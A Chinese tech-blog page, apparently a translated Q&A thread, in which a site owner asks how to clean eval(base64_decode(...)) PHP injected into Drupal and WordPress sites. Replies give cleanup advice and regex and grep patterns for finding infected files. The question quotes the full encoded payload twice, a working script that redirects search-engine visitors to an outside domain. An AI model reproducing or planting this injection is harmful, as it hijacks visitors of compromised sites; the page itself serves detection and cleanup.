当前位置: 文江博客话题详情

用于查找以 eval(base64_decode) 开头的恶意代码的模式

发布于 01-02 11:53 字数 1524 浏览 4 评论 0原文

当我的所有 Drupal 和 Wordpress 站点中插入以下 PHP 时,我的服务器出现了问题。

我已经下载了站点的完整备份,并将在更改我的 ftp 详细信息并再次重新上传之前清理它们。希望这能澄清事情。

我的问题是:

使用 Notepad++ 是否有一个 *.* 样式的搜索条件,我可以使用它来扫描我的备份文件并删除恶意代码行,而无需在本地单独执行这些操作机器?

这显然会节省我大量的时间。到目前为止,我一直用空白替换以下代码,但评估代码在我的每个站点上都不同。

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
原文

I've been having issues on my server with the following PHP inserted in all of my Drupal and Wordpress sites.

I have downloaded a full backup of my sites and will clean them all before changing my ftp details and reuploading them again. Hopefully this should clear things up.

My question is:

Using Notepad++ is there a *.* style search criteria I could use to scan my backup files and delete the lines of malicious code without having to do them all individually on my local machine?

This would clearly save me loads of time. Up to now, I've been replacing the following code with blank but the eval code varies on each of my sites.

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

梦旅人picnic2025-01-09 11:53:16

我会立即更改您的 FTP 详细信息。如果他们能够算出密码,您就不希望他们托管软件或其他东西。

然后关闭您的网站,以便您的访问者不会受到任何脚本或劫持。

就搜索而言,像这样的正则表达式应该可以解决问题:

eval\(base64_decode\("[\d\w]+"\)\);

I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.

Then shutdown your site so that your visitors are not subjected to any scripts or hijacks.

As far as searching goes a regex like this should sort it out:

eval\(base64_decode\("[\d\w]+"\)\);
回复 原文
无人问我粥可暖2025-01-09 11:53:16

我的 WordPress 博客也遇到了同样的问题,eval base64_decode hack 。 php 文件被注入了这些 eval 行。我建议您重新安装 wordpress/drupal,因为您的站点中可能已经存在一些其他脚本,然后更改所有密码。

尝试通过 ssh 运行 grep,例如。 grep -r -H“eval base64_decode”。它会显示哪些文件被感染。然后,如果您有时间,请自动化该过程,以便在再次发生这种情况时您会收到通知。

并且在将来,请始终更新 WordPress/Drupal。

I've also had the same problem with my WordPress blogs, eval base64_decode hack. The php files were being injected with those eval lines. I suggest you reinstall wordpress/drupal, as some other scripts may already be present in your site, then change all passwords.

Try running grep through ssh, eg. grep -r -H "eval base64_decode". It'll show you which files are infected. Then if you have time, automate the process so you will be notified in case it happens again.

And in the future, always update WordPress/Drupal.

回复 原文
千纸鹤带着心事2025-01-09 11:53:16

如果您可以使用特殊的工具来删除此恶意代码,那就更容易了,因为找到与所有代码匹配的实际正则表达式可能很棘手,而且您永远不知道它是否有效,或者您破坏了您的网站。特别是当你有多个文件时,你应该通过以下命令来识别可疑文件:

grep -R eval.*base64_decode  .
grep -R return.*base64_decode  .

但这可能还不够,所以你应该考虑使用这些PHP 安全扫描器

有关更多详细信息,请查看:如何像 PHP 病毒文件一样摆脱 eval-base64_decode?。

对于 Drupal,另请检查:如何在被黑客攻击后从管理页面中删除恶意脚本?

It's easier if you can use special tools to remove this malicious code, because it could be tricky to find the actual regex to match all the code and you never know if that worked, or you broken your site. Especially when you've multiple files, you should identify the suspicious files by the following commands:

grep -R eval.*base64_decode  .
grep -R return.*base64_decode  .

but it could be not enough, so you should consider using these PHP security scanners.

For more details, check: How to get rid of eval-base64_decode like PHP virus files?.

For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?

回复 原文
~没有更多了~

关于作者

顾北清歌寒

暂无简介

文章
评论
26 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

Mr.HU

文章 0 评论 0

疯到世界奔溃

文章 0 评论 0

隔纱相望

文章 0 评论 0

萌无敌

文章 0 评论 0

梦幻的味道

文章 0 评论 0

自在安然

文章 0 评论 0

更多

友情链接

文江博客
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文